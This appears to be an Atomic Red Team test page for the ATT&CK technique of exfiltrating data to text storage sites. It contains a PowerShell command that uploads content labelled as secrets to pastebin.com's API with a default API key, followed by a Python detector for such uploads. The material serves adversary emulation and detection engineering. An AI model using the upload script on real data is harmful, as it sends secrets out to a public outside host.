T1567.003 - Exfiltration Over Web Service: Exfiltration to Text Storage Sites

Description from ATT&CK

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information.

Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)

Note: This is distinct from Exfiltration to Code Repository, which highlights access to code repositories via APIs.

Atomic Tests


Atomic Test #1 - Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)

This test uses HTTP POST to exfiltrate data to a remote text storage site (pastebin).
See https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it

Supported Platforms: Windows

auto_generated_guid: c2e8ab6e-431e-460a-a2aa-3bc6a32022e3

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| api_key | Pastebin API key | string | 6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0 |

Attack Commands: Run with powershell!

$apiKey = "#{api_key}"
$content = "secrets, api keys, passwords..."
$url = "https://pastebin.com/api/api_post.php"
$postData = @{
  api_dev_key   = $apiKey
  api_option    = "paste"
  api_paste_code = $content
}
$response = Invoke-RestMethod -Uri $url -Method Post -Body $postData
Write-Host "Your paste URL: $response"
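
A defender-side check for the request this test generates, as an added example that is not part of the Atomic Red Team project: it scans proxy records for POSTs to the pastebin API endpoint that create a paste, and redacts the API key in the alert. The tab-separated log format, the field order and the sample records are assumptions constructed for illustration; seeing the request body requires a TLS-inspecting proxy or equivalent endpoint telemetry.

```python
from urllib.parse import urlsplit, parse_qs

# Hosts treated as text storage sites; only pastebin.com comes from the page.
TEXT_STORAGE_HOSTS = {"pastebin.com"}
UPLOAD_PATHS = {"/api/api_post.php"}  # endpoint used by the atomic test

# Constructed sample records in an assumed tab-separated format:
# timestamp, client host, process, method, URL, form-encoded request body
SAMPLE_LOG = "\n".join([
    "2024-05-01T10:00:01Z\tWS-014\tchrome.exe\tGET\thttps://pastebin.com/raw/AbCd1234\t",
    "2024-05-01T10:02:17Z\tWS-014\tpowershell.exe\tPOST\thttps://pastebin.com/api/api_post.php\t"
    "api_dev_key=EXAMPLE-KEY-NOT-REAL&api_option=paste&api_paste_code=secrets%2C+api+keys%2C+passwords...",
    "2024-05-01T10:05:40Z\tWS-020\tpowershell.exe\tPOST\thttps://intranet.example/api/api_post.php\tx=1",
    "2024-05-01T10:06:02Z\tWS-021\tcurl.exe\tPOST\thttps://PASTEBIN.com/api/api_post.php\tapi_option=other",
])

def redact(value, keep=4):
    """Keep only the first few characters of a credential for the alert."""
    return value[:keep] + "*" * max(len(value) - keep, 0)

def find_paste_uploads(log_text):
    """Return one alert dict per POST that creates a paste on a text storage site."""
    alerts = []
    for line in log_text.splitlines():
        fields = line.split("\t")
        if len(fields) != 6:
            continue  # skip malformed records instead of failing the whole run
        ts, host, process, method, url, body = fields
        parts = urlsplit(url)
        if method.upper() != "POST":
            continue
        if (parts.hostname or "").lower() not in TEXT_STORAGE_HOSTS:
            continue
        if parts.path not in UPLOAD_PATHS:
            continue
        form = parse_qs(body, keep_blank_values=True)
        if form.get("api_option", [""])[0] != "paste":
            continue  # any other api_option value does not upload content
        content = form.get("api_paste_code", [""])[0]
        alerts.append({
            "time": ts, "client": host, "process": process,
            "bytes_uploaded": len(content.encode("utf-8")),
            "api_dev_key": redact(form.get("api_dev_key", [""])[0]),
        })
    return alerts

if __name__ == "__main__":
    for alert in find_paste_uploads(SAMPLE_LOG):
        print(alert)
```

Only the second sample record is reported: the browser GET, the unrelated host with the same path, and the POST that does not create a paste are all skipped.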